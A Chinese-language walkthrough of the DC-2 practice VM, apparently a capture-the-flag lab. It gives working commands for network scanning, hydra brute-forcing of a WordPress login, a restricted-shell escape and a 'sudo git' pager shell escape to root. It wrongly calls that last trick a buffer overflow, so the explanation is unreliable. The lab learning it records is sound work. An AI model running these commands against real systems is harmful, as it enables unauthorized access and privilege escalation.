环境：

kali：192.168.75.129              DC2 -靶机 和 kali 在同一C段

先是arp-scan -l检索局域网内主机

发现靶机地址，使用nmap进行扫描 nmap -A -p 1-65535 192.168.75.136

发现打开了80端口，SSH端口

那么直接访问80看看有没有什么神奇的东西

还跳转了，上hosts重定向。

win10路径： C:WindowsSystem32driversetc

linux路径：/etc/hosts 

访问成功，发现flag1

使用工具 cewl爬取生成密码

cewl http://dc-2/ -w passwd.txt

准备使用wpscan进行搞事情，但我。。

上hydra大杀器吧，修是不可能修的，，，WordPress默认后台地址：/wp-admin 且WordPress当用户名不存在时会提示用户不存在，可增加爆破效率

hydra -L user.txt  -P passwd.txt dc-2 http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'

我们跑出了 jerry和tom账户，登进去看看

tom，没啥东西，jerry用户界面如下，发现了flag2

啊哈

想到上一个DC1的靶机是用SSH干进去的

问题是，WordPress的CMS本身还是比较安全的，问题基本都出在插件上，可这个jerry的账号权限不够，无法安装插件来上传shell

那就硬着头皮ssh试试看，用登录账号密码试试

jerry老贼不是同一个密码，太草（一种植物）蛋了

试试看Tom老贼

不愧是你。。。。

执行命令发现 command not found，百度得知这是因为ssh远程连接到服务器的环境变量中不包含对应可执行文件的路径。需要自行添加

BASH_CMDS[a]=/bin/sh;a 
$ /bin/bash
export PATH=$PATH:/bin/
export PATH=$PATH:/usr/bin

得到flag3

切换到Jerry，发现flag4.txt

哈？Git还能提权？

试试看吧。看看git有没有那个权限 sudo -l

flag不会骗人（小声bb）

sudo git -p help
!/bin/sh

奇怪，我怎么没法提权，查了查百度，发现

git有一个缓冲区溢出漏洞，在使用sudo git -p –help时，不需要输入root密码即可以root权限执行这条命令。我们尽量减小缓冲区的行数，使其一次性显示不完这条命令的回显结果，这样这条命令就一直处于运行状态，加上此时处于root权限，我们直接在这时候打开bash shell，直接提权至root。

看起来要打开gui了，来自Xshell的鄙，艹（一种植物）

奇怪的知识增加了